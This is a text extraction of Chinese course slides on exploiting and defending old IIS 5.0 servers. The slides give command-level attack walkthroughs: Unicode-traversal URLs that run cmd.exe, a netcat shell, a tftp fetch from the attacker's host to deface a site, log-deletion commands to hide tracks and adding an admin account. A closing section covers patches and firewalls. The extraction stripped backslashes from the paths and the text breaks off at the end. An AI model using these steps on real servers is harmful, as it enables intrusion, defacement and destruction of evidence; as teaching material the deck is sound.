基于漏洞的入侵及其防范之二

单击此处编辑母版标题样 式 单击此处编辑母版副标题样式 *1 IIS中的漏洞利用与防范 nIIS中的漏洞 nIIS5.0是Windows 2000中附带的Web服务器， 功能很强大，但是漏洞也比较多。据说，现在 已经发现了IIS5.0的一千多个漏洞。也许更多 的还没有被发现。 Date2 Windows 2000中的Internet 信息服务 Date3 IIS常见漏洞 n.IDA&.IDQ漏洞 nPrinter漏洞 nUnicode漏洞 n.asp映射分块编码漏洞 nWebdav漏洞 Date4 1.漏洞的原因：ida和idq是iis中用来提供索引服务 的一种文件。如果在Web服务器中存在这种文件， 那么客户可以从浏览器中请求这种文件进行数据查 询。Iis会把客户的请求转给一个名为idq.dll的动态连 接库进行处理 2.Idq.dll文件中存在一个缓冲区溢出漏洞。当超过指 定长度的请求被传进来的时候，服务器会出错。如 果该请求被黑客精心构造（这种请求数据称为 shellcode），服务器会执行请求数据中的程序代码 。成功利用该漏洞，可以以管理员的身份运行 Shellcode，进行可能完全控制该服务器。 ida.&.idq漏洞 Date5 一个ida&idq漏洞的攻击工具 Date6 .printer漏洞的利用 n使用工具：IIS5.Printer Exploit进行漏洞利用 n入侵过程： q在本地用NC打开一个监听端口：nc l p 250 q用“IIS5Exploit 目标IP 本地IP 250” 命令对远程 主机进行漏洞溢出 q在获得远程主机的命令窗口后，可建立账号 Date9 Unicode目录遍历漏洞(教材P143) nUnicode 目录遍历也是IIS上一个著名的漏洞 nNimda(尼姆达)病毒利用了该病毒进行传播 n SP2和之前的版本中存在 n借助于该漏洞，可以访问与Web根目录在同一 个驱动器上的文件。如果该驱动器是安装系统 的驱动器，则可以访问cmd.exe，并可以以 IUSR_machinename (这里的machinename是 机器名，该帐号在安装IIS的时候自动建立)的 身份运行命令 Date10 n利用该漏洞，一般不能直接获取服务器的管理 员权限，但是一般可以修改Web服务器上的网 页内容，获得网站的控制权。 n配合Windows和IIS的其他漏洞，一般可以得 到系统管理员的权限 n利用该漏洞，可以在IE中执行远程命令 Date11 漏洞的探查 n可以使用XScan进行扫描，也可以手工测试 n在Windows中，表示上层目录，所以在命令 中可以使用 表示上层的上层。但在iis中如 果直接输入 将被过滤掉。但是编程人员犯 了一个错误，可以使用 unicode字符（如 %c1%1c）表示”/”，而这样并不会被过滤，因 而可以正常访问。 Date12 利用Unicode漏洞操作目标主机文件 n1.显示文件内容 如果想显示目标主机里面的一个名为lucky.txt文本文件，输人 下面这行命令即可(要显示htm, asp, bat等文件都用同样的方 法): http:/216.246.X.X/scripts/%c1%1c/winnt/ system32/cmd.exe?/c+type+c:lucky.txt 这样该文件的内容就可以通过IE显示出来。 n2.删除文件 输入如下命令，即可删除主机上lucky.txt文件: http:/216.246.X.X/scripts/%c1%1c/winnt/ system32/cmd.exe?/c+del+c:lucky.tx Date13 n3.copy文件的同时将该文件改名 输入如下命令，即可将主机上的lucky.txt改名为luck.txt： http:/216.246.X.X/scripts/%c1%1c/winnt/ system32/cmd.exe?/c+copy+c:lucky.txt luck.txt n4.COPY文件到另外的文件夹 输入如下命令，就可以主机上的c:lucky文件夹下的文件全部 copy到c:inetpubwwwroot下了: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/cmd. exe?/c+xcopyc:luckyc:inetpubwwwroot Date14 attrib命令使用示例 n运行下面的命令，可以看到目标主机 C:inetpubwwwroot下的index.htm文件的属性: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/attrib.exe ?c:inetpubwwwrootindex.htm n运行下面的命令，把目标主机c:inetpubwwwroot下的 index.htm文件设为只读、隐藏属性: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/attrib.exe ?%20%2br%20%2bh%20c:inetpubwwwrootindex.htm n运行下面的命令可以解除文件的属性: http:/216.246.X.X/scripts/%c1%1c/winnt/system32/attrib.exe ?%20-r%20-h%20c:inetpubwwwrootindex.htm 说明：这里“%2b“等同于“+“ Date15 Unicode漏洞利用 n入侵者将具有IUSR_machinename权限，只能进行简单的文件类 操作，但对网站来说，这些也是致命的。 n漏洞利用的著名例子：网站被“黑”。 n实现过程： qSTEP1：准备自己的页面，改名(如a.htm)； qSTEP2：探知WEB根目录。两种方法。一是利用IDA&IDQ漏洞； 二是使用文件查找法(如mmc.gif)，在IE中输入： http:/IP/scripts/%c1%1c/winnt/system32/cmd.exe?/c+dir+c: mmc.gif/s qSTEP3：探知主页文件名。在IE栏中输入： dir+c:Inetpubwwwroot ，可知主页文件是哪个（如index.htm)。 qSTEP4：用TFTP服务器软件更换主页。方法：把个人页面拷贝到 TFTP服务器路径下，然后用WINDOWS自带的TFTP命令进行主 页更改。即在IE中把前面命令中从“？”后面开始换成如下命令： /C+tftp+本机IP+get+a.htm+c:inetpubwwwrootindex.htm n结果：再次登录该网站时看到的是你的a.htm页面。 Date16 补充：TFTP命令学习 nTftpd32.exe可以网上下载（tools中也可找到），解 压之后即可用。运行该程序之后，本机即成为一台小 小FTP服务器。利用Windows自带的TFTP命令可以 进行文件的上传下载。 n使用命令：TFTP -i host get/put source 目的地 q参数说明：-I 二进制文件传输；GET 下载；PUT 上传； SOURCE 文件名。 n例： http:/IP/scripts/%c1%1c/winnt/system32/cmd.exe?/c +tftp++get+1.htm+c:inetpubwwwrootind ex.htm” n功能：从主机中下载1.htm文件并用它来替 换IP主机上的“c:inetpubwwwrootindex.htm”文件 Date17 补充：擦脚印 n在客户端IE中依次使用如下命令来清除对方服 务器上的日志文件： qDel+c:winntsystem32logfiles*.* qDel+c:winntsystem32config*.evt qDel+c:winntsystem32dtclog*.* qDel+c:winntsystem32*.log qDel+c:winntsystem32*.txt qDel+c:winnt*.txt qDel+c:winnt*.log Date18 补充：利用UNICODE漏洞获得系统权 限 n思路：添加IDQ漏洞；使用ISPC与远程服务器 连接；添加管理员账号；断开连接 n步骤： q把IDQ.DLL拷贝到远程服务器：使用命令 “tftp+IP+get+idq.dll+c:InetpubScriptsidq.dll” q使用ISPC与该服务器实现连接：在本地CMD中输 入“ispc IP/scripts/idq.dll”进行连接，可以得到远程 的CMD窗口 q添加管理员账号：略 q断开连接：EXIT Date19 WebDAV（Web-based Distributed Authoring and Versioning 分布式创作和 版本控制）远程缓冲区溢出漏洞 n检测：WebDAVScan n利用：使用工具WebDAVx3(对中文版IIS5.0) n过程： q扫描漏洞（webdavscan） q溢出：在CMD窗口下输入webdavx3 IP q登录：用telnet或nc(端口为7788） n效果：远程控制；DoS(拒绝服务攻击) Date20 其它常见漏洞 n论坛漏洞 q上传漏洞 q暴库漏洞（在错误信息中显示数据库的物理路径） nBLOG漏洞 q直接下载数据库漏洞 qCOOKIE漏洞（欺骗漏洞） Date21 单击此处编辑母版标题样 式 单击此处编辑母版副标题样式 *22 针对网络漏洞的防范措施 * 正确的安全意识 n机密的数据-不要直接连接到Internet上 n建立一个较完备的备份策略 Date23 * 安装最新的服务包 nWindows 2000 -SP4 nWindows XP -SP2 nWindows 的服务包包含一定时期的已经发现 的安全漏洞更新。 n在服务包发布之后，如果有新的安全漏洞被发 现，会以“安全补丁”的形式推出 Date24 * 安装安全更新 n及时安装系统最新的安全补丁。一般上，可以 设置为“自动更新” n经常访问“微软安全公告”，地址为 /china/security/Bulletins/ n访问一些正规的安全站点（如 ），了解最新的安全漏洞。但是要避免访问一 些不正规的黑客站点，因为有些黑客站点往往 就会利用客户的漏洞进行破坏或者在下载的黑 客软件中放入有害程序 Date25 关闭不必要的服务和功能 n关闭不必要的网络服务 对于个人计算机来说，可以关闭所有的网络服 务 对于网络服务器，仅仅开启必要的网络服务 n关闭服务中不必要的功能 如IIS中，如果是静态网站，不要给网站虚拟 目录“执行”、“运行脚本”的权限 如果要开启asp功能，在开启“运行脚本”后， 删除所有除了“asp, asa”之外的扩展名影射， 删除所有过滤器 Date26 安装网络防火墙 n在防火墙上仅仅开放必要的网络端口，增加网 络入侵的难度 nWindows xp sp2和Windows 2003自带了网络 防火墙，因此可以打开，增强安全性 Date27 调查 n到目前（2009年3月），Windows 200